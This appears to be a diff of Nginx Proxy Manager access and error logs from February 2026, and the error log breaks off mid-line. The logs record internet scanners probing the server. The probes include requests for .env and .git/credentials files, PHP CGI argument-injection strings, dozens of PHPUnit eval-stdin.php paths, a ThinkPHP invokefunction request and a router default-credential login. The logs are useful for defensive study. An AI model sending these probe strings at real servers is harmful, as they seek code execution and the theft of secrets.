222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:18:31:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:18:49:16 +0000] 404 - GET http 222.117.41.51 "/cgi-bin/luci/;stok=/locale" [Client 5.61.209.92] [Length 150] [Gzip -] "-" "-" +[18/Feb/2026:18:50:51 +0000] 400 - GET http 222.117.41.51 "/" [Client 44.220.188.205] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/50.0.3036.94 Safari/537.32" "-" +[18/Feb/2026:18:51:32 +0000] 400 - GET http 222.117.41.51 "/" [Client 185.242.226.111] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[18/Feb/2026:18:56:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.157.180.116] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[18/Feb/2026:18:56:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:19:01:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 185.226.197.74] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[18/Feb/2026:19:14:36 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:19:22:49 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:19:48:55 +0000] 404 - GET http httpbin.org "/ip" [Client 87.121.84.172] [Length 122] [Gzip 1.35] "ProxyPool-Scanner/2.0" "-" +[18/Feb/2026:19:49:06 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:20:04:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:20:13:39 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[18/Feb/2026:20:14:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:20:15:55 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:20:21:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 205.210.31.83] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:20:21:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 205.210.31.83] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:20:24:48 +0000] 404 - GET http 222.117.41.51 "/cgi-bin/luci/;stok=/locale" [Client 5.61.209.92] [Length 150] [Gzip -] "-" "-" +[18/Feb/2026:20:41:36 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:20:48:06 +0000] 400 - - http localhost "-" [Client 59.173.109.47] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:20:48:23 +0000] 400 - GET http 222.117.41.51 "/" [Client 101.249.60.2] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[18/Feb/2026:20:48:35 +0000] 400 - GET http 222.117.41.51 "/" [Client 220.167.232.168] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[18/Feb/2026:20:49:36 +0000] 400 - GET http 222.117.41.51 "/" [Client 220.167.232.37] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[18/Feb/2026:20:55:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.92.1.85] [Length 0] [Gzip -] "-" "-" +[18/Feb/2026:20:57:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.153.104.196] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[18/Feb/2026:21:03:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 115.231.78.11] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36" "-" +[18/Feb/2026:21:03:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 115.231.78.11] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" "-" +[18/Feb/2026:21:03:20 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Feb/2026:21:03:20 +0000] 404 - GET http 222.117.41.51 "/robots.txt" [Client 115.231.78.11] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" "-" +[18/Feb/2026:21:06:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:21:09:36 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:21:30:15 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:21:44:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[18/Feb/2026:21:49:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:21:56:49 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:22:04:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 103.203.57.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[18/Feb/2026:22:07:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 85.217.149.27] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:22:07:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:22:18:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:22:20:34 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 198.235.24.234] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[18/Feb/2026:22:22:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:22:29:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 35.202.9.133] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)" "-" +[18/Feb/2026:22:46:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" diff --git a/npm/data/logs/fallback_http_error.log b/npm/data/logs/fallback_http_error.log index ba5f233..f8090c6 100644 --- a/npm/data/logs/fallback_http_error.log +++ b/npm/data/logs/fallback_http_error.log @@ -247,3 +247,428 @@ 2026/02/17 00:37:54 [error] 901#901: *40043 open() "/var/www/html/hudson" failed (2: No such file or directory), client: 20.163.14.222, server: localhost-nginx-proxy-manager, request: "GET /hudson HTTP/1.1", host: "222.117.41.51" 2026/02/17 00:43:58 [error] 902#902: *40045 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.80.88.32, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "222.117.41.51" 2026/02/17 02:27:54 [error] 898#898: *40379 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 03:40:10 [error] 896#896: *40750 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 03:40:50 [error] 899#899: *40765 open() "/var/www/html/WuEL" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /WuEL HTTP/1.1", host: "222.117.41.51" +2026/02/17 03:40:51 [error] 899#899: *40767 open() "/var/www/html/a" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /a HTTP/1.1", host: "222.117.41.51" +2026/02/17 03:40:52 [error] 899#899: *40768 open() "/var/www/html/download/file.ext" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /download/file.ext HTTP/1.1", host: "222.117.41.51" +2026/02/17 03:40:53 [error] 899#899: *40769 open() "/var/www/html/SiteLoader" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /SiteLoader HTTP/1.1", host: "222.117.41.51" +2026/02/17 03:40:53 [error] 899#899: *40770 open() "/var/www/html/mPlayer" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /mPlayer HTTP/1.1", host: "222.117.41.51" +2026/02/17 04:53:47 [error] 899#899: *42443 open() "/var/www/html/login" failed (2: No such file or directory), client: 167.94.138.201, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "222.117.41.51" +2026/02/17 05:11:42 [error] 899#899: *42445 open() "/var/www/html/actuator/health" failed (2: No such file or directory), client: 20.65.193.129, server: localhost-nginx-proxy-manager, request: "GET /actuator/health HTTP/1.1", host: "222.117.41.51" +2026/02/17 06:37:50 [error] 912#912: *42487 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 184.105.247.195, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "222.117.41.51" +2026/02/17 06:40:28 [error] 912#912: *43975 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 184.105.247.195, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "222.117.41.51" +2026/02/17 06:54:12 [error] 912#912: *43981 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 124.29.214.186, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" +2026/02/17 07:00:00 [error] 912#912: *43988 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:01 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:01 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:02 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:02 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:03 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:04 [error] 912#912: *43988 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:05 [error] 912#912: *43988 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:05 [error] 912#912: *43988 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:06 [error] 912#912: *43988 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:07 [error] 912#912: *43988 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:07 [error] 912#912: *43988 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:08 [error] 912#912: *43988 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:08 [error] 912#912: *43988 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:08 [error] 912#912: *43988 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:09 [error] 912#912: *43988 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:09 [error] 912#912: *43988 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:10 [error] 912#912: *43988 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:10 [error] 912#912: *43988 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:11 [error] 912#912: *43988 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:11 [error] 912#912: *43988 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:12 [error] 912#912: *43988 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:13 [error] 912#912: *43988 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:13 [error] 912#912: *43988 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:14 [error] 912#912: *43988 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:15 [error] 912#912: *43988 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:15 [error] 912#912: *43988 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:16 [error] 912#912: *43988 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:16 [error] 912#912: *43988 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:17 [error] 912#912: *43988 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:18 [error] 912#912: *43988 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:18 [error] 912#912: *43988 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:19 [error] 912#912: *43988 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:20 [error] 912#912: *43988 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:20 [error] 912#912: *43988 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:21 [error] 912#912: *43988 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:21 [error] 912#912: *43988 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:22 [error] 912#912: *43988 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:23 [error] 912#912: *43988 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:23 [error] 912#912: *43988 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 07:00:25 [error] 912#912: *43988 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 08:11:07 [error] 913#913: *44053 open() "/var/www/html/.git/credentials" failed (2: No such file or directory), client: 195.178.110.162, server: localhost-nginx-proxy-manager, request: "GET /.git/credentials HTTP/1.1", host: "222.117.41.51" +2026/02/17 09:35:33 [error] 906#906: *44111 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:34 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:34 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:34 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/17 09:35:34 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No 